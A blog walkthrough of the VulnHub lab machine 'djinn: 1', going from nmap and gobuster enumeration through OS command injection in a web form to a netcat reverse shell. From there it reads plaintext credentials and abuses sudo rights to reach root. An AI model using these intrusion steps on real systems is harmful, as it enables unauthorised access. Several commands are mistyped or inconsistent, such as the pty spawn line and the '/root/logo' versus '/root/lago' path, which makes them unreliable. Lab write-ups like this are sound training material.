djinn: 1 vulnhub Walkthrough

djinn: 1 CTF | djinn: 1 vulnhub CTF Writeup

In this article, we will be looking at some interesting VulnHub machines. This time, we will take a look at a VulnHub machine called djinn: 1 This VM is created by 0xmzfr you can download here

Description

The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read the flag which is present in /root/proof.sh. If you’ve done djinn1 then you’ll notice some kind of similarity in services also a continuation in the storyline.

Network Scanning

let’s try to find the IP of this machine using the netdiscover command.

netdiscover
 djinn: 1 vulnhub Walkthrough vulnhub

Nmap scanning all open port and running services

nmap -sV 192.168.1.6 -p-
 djinn: 1 vulnhub Walkthrough vulnhub

Enumeration

let’s browse over to port 80. Below is the landing page for port 80

http:192.168.1.6:7331
 djinn: 1 vulnhub Walkthrough vulnhub

I try dirb scanning but I didn’t see useful directory We used the go buster tool for directory Bruteforce. and we find two pages genie and wish

gobuster dir -u http://192.168.1.6:7331/ -w /usr/share/wordlists/dirb/big.txt -t 50 -q

I opened the /genie page. URL It is showing a message ( It’s not that hard )

http://192.168.1.6:7331/genie

next option is open the second URL /wish and we see a placeholder and submit button I ran the kernel version checking command

http://192.168.1.6:7331/wish
 djinn: 1 vulnhub Walkthrough vulnhub

and we see the output next page I confirm this URL vulnerable os command injection

 djinn: 1 vulnhub Walkthrough vulnhub

Exploitation

I try many payloads and Metasploit web delivery payload but they didn’t work here again I create simple bash reverse shell and encode the shell base64 using this command and starting our netcat listener

nc -lvp

After start netcat listener copy our base64 reverse payload and paste the placeholder field and click submit button

 djinn: 1 vulnhub Walkthrough vulnhub

and I got a netcat reverse connection target machine I move on enumerating target directory and files

cd /home
ls
cd nitish
ls -lsa
cd .dev

ls

cat creds.txt

 djinn: 1 vulnhub Walkthrough vulnhub

Privilege Escalation

I found a creds.txt file cat command to we see the Nitish user and password I move on next step switch user using su command

su nitish
/bin/bash

we see blank shell now import python3 spawn shell using this command

python3 -c 'import pty;pty;.spawn("/bin/bash")'

checking Sudo rights of the user Nitish using the command

sudo -l

We found that the user Nitish can execute the genie binary without any password for user sam. using this command we successfully managed or get a shell of user sam

sudo -u sam /usr/bin/genie -cmd id
bash

I again tried to enumerate the Sudo Permissions. for user sam As we can see user sam can execute the command /root/logo as root

sudo -l
 djinn: 1 vulnhub Walkthrough vulnhub

I run the command using sudo and I got a root shell I move on root user home directory and finally, I found our last flag proof.sh

sudo -u root /root/lago
bash

cd /root

ls

reading the last flag

cat proof.sh
 djinn: 1 vulnhub Walkthrough vulnhub
Me and my Girlfriend 1 Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →